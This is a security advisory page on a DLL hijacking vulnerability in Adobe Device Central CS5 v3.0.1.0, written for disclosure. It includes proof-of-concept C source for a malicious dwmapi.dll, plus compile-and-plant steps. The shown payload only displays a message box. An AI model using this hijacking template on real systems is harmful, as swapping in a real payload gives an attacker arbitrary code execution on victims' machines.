Lucene search

K
zeroscienceGjoko KrsticZSL-2010-4950
HistoryAug 26, 2010 - 12:00 a.m.

Adobe Device Central CS5 v3.0.1.0 (dwmapi.dll) DLL Hijacking Exploit

2010-08-2600:00:00
Gjoko Krstic
zeroscience.mk
48

7.7 High

AI Score

Confidence

Low

Title: Adobe Device Central CS5 v3.0.1.0 (dwmapi.dll) DLL Hijacking Exploit
Advisory ID: ZSL-2010-4950
Type: Local/Remote
Impact: System Access
Risk: (4/5)
Release Date: 26.08.2010

Summary

Adobe® Device Central CS5 software simplifies the production of innovative and compelling content for mobile phones and consumer electronics devices. Adobe Device Central CS5 now offers support for HTML and the latest versions of Adobe Flash® Player software.

Description

Adobe Device Central CS5 suffers from a dll hijacking vulnerability that enables the attacker to execute arbitrary code on a local level. The vulnerable extensions are .adcp, .adpp, .advs, .ascs and .prf thru dwmapi.dll library.

Vendor

Adobe Systems Inc. - <http://www.adobe.com>

Affected Version

CS5 v3.0.1.0 (3027)

Tested On

Microsoft Windows XP Professional SP3 (English)

Vendor Status

N/A

PoC

adobedc_dll.c

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://packetstormsecurity.org/filedesc/adobedc_dll.txt.html&gt;
[2] <http://www.corelan.be:8800/index.php/2010/08/25/dll-hijacking-kb-2269637-the-unofficial-list/&gt;
[3] <http://www.exploit-db.com/dll-hijacking-vulnerable-applications/&gt;

Changelog

[26.08.2010] - Initial release
[27.08.2010] - Added reference [1], [2] and [3]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>/*

 Adobe Device Central CS5 v3.0.1.0 (dwmapi.dll) DLL Hijacking Exploit

 Vendor: Adobe Systems Inc.
 Product Web Page: http://www.adobe.com
 Affected Version: CS5 v3.0.1.0 (3027)

 Summary: Adobe� Device Central CS5 software simplifies the production
 of innovative and compelling content for mobile phones and consumer
 electronics devices. Adobe Device Central CS5 now offers support for
 HTML and the latest versions of Adobe Flash� Player software.

 Desc: Adobe Device Central CS5 suffers from a dll hijacking vulnerability
 that enables the attacker to execute arbitrary code on a local level. The
 vulnerable extensions are .adcp, .adpp, .advs, .ascs and .prf thru dwmapi.dll
 library.

 ----
 gcc -shared -o dwmapi.dll adobedc.c

 Compile and rename to dwmapi.dll, create a file test.adcp or any of the above
 vulnerable extensions and put both files in same dir and execute.
 ----

 Tested on Microsoft Windows XP Professional SP3 (EN)



 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Zero Science Lab - http://www.zeroscience.mk


 25.08.2010

*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}</windows.h></p></body></html>

7.7 High

AI Score

Confidence

Low